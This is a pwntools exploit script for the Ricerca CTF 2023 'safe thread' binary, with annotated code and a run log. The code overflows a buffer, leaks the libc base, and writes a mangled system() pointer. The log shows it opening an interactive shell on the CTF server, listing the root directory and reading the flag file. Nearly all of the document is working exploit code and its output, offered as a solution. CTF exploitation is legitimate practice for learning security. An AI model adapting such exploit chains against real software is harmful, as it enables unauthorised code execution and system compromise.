Ricerca CTF 2023 - safe thread
#!/usr/bin/env python | |
from pwn import * | |
# pwntools global settings: open gdb in a horizontal tmux split, and derive
# os/arch from the target binary so packing helpers (p64/u64) match it.
context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window
# libc = ELF('')
elf = ELF('./chall')  # challenge binary, expected in the working directory
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log
# Endpoints selected by the command-line option parsed further down:
# 'r' -> the CTF service, 'l' -> a local listener.
RHOST = "safe-thread.2023.ricercactf.com"
RPORT = 9004
LHOST = "127.0.0.1"
LPORT = 21700
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of the ELF section called *name*.

    ``elf`` defaults to the module-level target binary (bound when this
    function is defined). If no section with that name exists,
    ``get_section_by_name`` returns None and the attribute access raises
    AttributeError.
    """
    section = elf.get_section_by_name(name)
    header = section.header
    return header['sh_addr']
def dbg(ss):
    """Log the value of the Python expression *ss* as ``<ss>: 0x<hex>``.

    The expression is evaluated with ``eval`` in this module's scope, so it
    is a debugging aid for names the author types in (e.g. ``'libc_base'``),
    not something to feed data received from the target into.
    """
    value = eval(ss)
    log.info("{}: 0x{:x}".format(ss, value))
# Connection setup. The first CLI argument selects the target: 'r' remote,
# 'l' local listener, 'd' run under gdb, anything else (or no argument) a
# plain local process ('a' additionally attaches gdb to it).
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
# NOTE(review): `opt in 'rl'` is a substring test, so 'rl' and '' also pass and
# then fail the dict lookup below with KeyError; `opt in ('r', 'l')` is the
# intended check.
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # NOTE(review): the script text has no '{}' placeholder, so .format() is a
    # no-op here; the main/entry-point address is computed but never used.
    gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./chall'], gdbscript=gdbscript)
else:
    conn = process(['./chall'])
    # conn = process(['./lazyhouse'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
# Every offset below (0x7d8, 0x21af00, 0x508f0, 0x1d8698, 0x870, 0x4288) and
# every fixed address (0x403f82, 0x404100, 0x4012c3) is specific to this
# challenge build and the libc it was run against; the script is not portable
# to other binaries or libc versions.
log.info('Pwning')
# NOTE(review): a str payload makes pwntools emit BytesWarning (visible in the
# run log); `b'%d\n' % (0x2000 + 1)` is the bytes equivalent.
payload = str(0x2000 + 1) + '\n'
conn.sendafter("size:", payload)
# First write: 0x7d8 bytes of filler, then a fixed address (the binary is
# non-PIE, so addresses in the 0x40xxxx range are stable), ten zero qwords,
# a few marker values around 0x404100, and finally 0x4012c3.
payload = b'x'*0x7d8
payload += p64(0x403f82)
payload += p64(0) * 10
payload += p64(0xdeadbeef) * 2 + p64(0x404100) + p64(0xdeadbee) + p64(0) + p64(0xbadbeef)
payload += p64(0x4012c3)
conn.sendafter("data", payload + b'\n')
# Leak: skip to the first NUL byte, read the next 7 bytes as a little-endian
# pointer and subtract a libc-build-specific offset to recover the base.
conn.recvuntil(b'\x00')
libc_base = u64(b'\x00'+conn.recv(7)) - 0x21af00
print("libc_base : " + hex(libc_base))
# The 0x4012c3 value placed by the first write is reused here as an XOR key.
# The shift/mask pair is effectively a 64-bit rotate-left by 0x11 for a
# canonical user-space pointer (bits 15-16 are forced to zero) — this looks
# like glibc's pointer mangling, TODO confirm against the target libc.
# 0x508f0 is presumed, from the variable name, to be system() in this build.
tcache_key = 0x4012c3
do_system = libc_base + 0x508f0 + 2
addr = ((do_system ^ tcache_key)<<0x11)&0xffffffffffff8000
addr += ((do_system ^ tcache_key)>>0x2f)&0x7fff
# Second write: the mangled value, one libc-relative address, two zero
# qwords, 'z' padding up to 0x870 bytes, then one more libc-relative pointer.
payload = p64(addr) + p64(libc_base + 0x1d8698) + p64(0) + p64(0)
payload = payload.ljust(0x870, b'z')
payload += p64(libc_base-0x4288)
conn.send(payload)
conn.interactive()
root@u22:~/safe-thread# python3 exp.py r | |
[*] '/root/safe-thread/chall' | |
Arch: amd64-64-little | |
RELRO: Full RELRO | |
Stack: No canary found | |
NX: NX enabled | |
PIE: No PIE (0x400000) | |
[+] Opening connection to safe-thread.2023.ricercactf.com on port 9004: Done | |
[*] Pwning | |
/root/safe-thread/exp.py:41: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes | |
conn.sendafter("size:", payload) | |
/usr/local/lib/python3.10/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes | |
res = self.recvuntil(delim, timeout=timeout) | |
libc_base : 0x7f54198ac000 | |
[*] Switching to interactive mode | |
s\xac\x19\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xac\x19\x7f\x00\x04\xac\x19\x7f\x00\x04\xac\x19\x7f\x00$ | |
$ ls | |
bin | |
boot | |
dev | |
etc | |
flag-b620074ecec0a4693a967174b8d8d4af.txt | |
home | |
lib | |
lib32 | |
lib64 | |
libx32 | |
media | |
mnt | |
opt | |
proc | |
root | |
run | |
sbin | |
srv | |
sys | |
tmp | |
usr | |
var | |
$ cat flag* | |
RicSec{pthread_1s_w34k_t0_BOF_by_d3s1gn} | |
$ |